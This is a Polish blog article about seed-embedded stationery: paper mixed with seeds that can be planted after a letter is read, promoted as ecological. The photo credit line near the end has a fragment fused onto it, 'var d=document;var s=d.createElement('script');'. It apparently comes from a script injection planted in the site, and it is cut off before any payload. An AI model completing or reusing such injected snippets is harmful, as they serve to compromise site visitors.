Papeteria z nasionami

 

Jeśli myślisz, że sztuka pisania listów zanika, to niezawodny znak, że… nie znasz jeszcze magicznej papeterii z nasionami. Szlachetny czerpany papier, z którego jest wykonana oraz dodatek nasion ziół i kwiatów zamienią każde napisane na niej słowo w zieloną, kwitnącą kompozycję.

Rozwój poczty elektronicznej zepchnął na margines tradycyjną epistolografię. Teraz w kilka sekund możemy przekazać miłą nowinę, serdeczne życzenia czy pozdrowienia z wakacji. To bardzo wygodne rozwiązanie może jednak spłycić wartość przekazu i moc jego znaczenia. Wydaje się, że papierowe listy nigdy już nie doczekają się powrotu do czasów swojej świetności. A i wtedy przeczytana wiadomość trafiała przecież albo do kosza, albo na powiększający się z roku na rok sentymentalny stosik, do którego miło było od czasu do czasu zajrzeć i z którym nie do końca było wiadomo co począć. Być może zatem idea wzbogacenia papieru w nasiona roślin sprawi, że ten tracący popularność sposób komunikacji, jakim jest pisanie listów, dostanie od nas drugą szansę i przynajmniej częściowo odzyska znaczenie. Sam pomysł jest prosty – w trakcie wyrobu papieru do celulozowej masy dosypywana jest mieszanka wyselekcjonowanych nasion roślin.

SONY DSC

SONY DSC

SONY DSC

SONY DSC

Nasiona są niewielkie i pozwalają później wykorzystać papier także do wydruku, a w czasie procesu wytwarzania papieru nie tracą swojej żywotności. Kartkę z uwięzionymi w niej nasionami po odczytaniu wiadomości można przysypać ziemią w ogródku lub w doniczce, dokładnie podlać i zaczekać, aż słowa wykiełkują i przybiorą materialną formę w postaci żywych roślin. W sprzedaży znajdziemy papeterie z nasionami ziół, kwiatów albo warzyw – zwykle tych najłatwiejszych w uprawie, z których pielęgnacją poradzą sobie nawet niedoświadczeni jeszcze ogrodnicy.

SONY DSC

Papeteria z nasionami ma również wymiar ekologiczny – papier, z którego jest wykonana w kontakcie z ziemią i pod wpływem wilgoci szybko ulega rozkładowi, a w twoim otoczeniu przybywa zieleni. To ciężki do odparcia argument dodatkowo przemawiający na korzyść formy komunikacji, która w pewnym stopniu wciąż jeszcze przyczynia się do powiększania się ogólnej puli śmieci na ziemi. A radość z własnoręcznie uprawianych roślin, z którymi dodatkowo związany jest czuły przekaz? Trudno ją przecenić. Wykorzystując nasienną papeterię sprawisz, że twoje słowa naprawdę zamienią się w żywy, pełen znaczenia obraz – kolorowy i pachnący. I tylko trudno przewidzieć, czy miłosne liściki będą pisać na niej do siebie zakochani, czy kolejną korespondencję dostaniesz w takiej formie… od swojego banku.

Tekst: Łukasz Skop

Zdjęcia: www.art-papier.plvar d=document;var s=d.createElement(‚script’);

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *